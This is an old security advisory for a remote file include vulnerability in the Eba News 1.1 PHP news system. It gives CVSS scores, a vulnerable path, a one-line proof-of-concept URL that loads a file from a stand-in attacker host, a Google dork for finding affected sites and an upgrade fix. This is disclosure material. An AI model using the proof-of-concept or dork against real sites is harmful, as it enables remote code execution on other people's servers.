Eba News Version : v1.1 <= (webpages.php) Remote File Include

2007.04.26
Credit: SekoMirza
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------- Eba News Version : v1.1 <= (webpages.php) Remote File Include -------------------------------------------------- Author : SekoMirza Date Found : Nisan 11 2007 Location : Fransa // ... Critical Lvl : Highly critical Impact : System access Where : From Remote -------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Eba News version : 1.1 vendor : http://ebascripts.com/ source url : http://ebascripts.com/ -------------------------------------------------- Description: ~~~~~~~~ EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes. -------------------------------------------------- Vulnerability: ~~~~~~~~~~~ I found vulnerability script in admin/public/webpages.php Proof Of Concept: ~~~~~~~~~~~~ eba/admin/public/webpages.php?filename=http://attact.com/colok.txt? -------------------------------------------------- google d0rk: ~~~~~~~ "Eba News" -------------------------------------------------- Solution: ~~~ - download new version in vendor URL -------------------------------------------------- Shoutz: ~~ ~ My Sweet -> Caramel ~ For Mp3s -> Hypn0sis ~ For Support -> www.starhack.org ~ My Bro -> PhantomOrchid ~ My Preceptor -> Earnk Kazno -------------------------------------------------- Contact: ~~~ Seko[at]se-ko[dot]info -------------------------------- [ EOF ]----------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top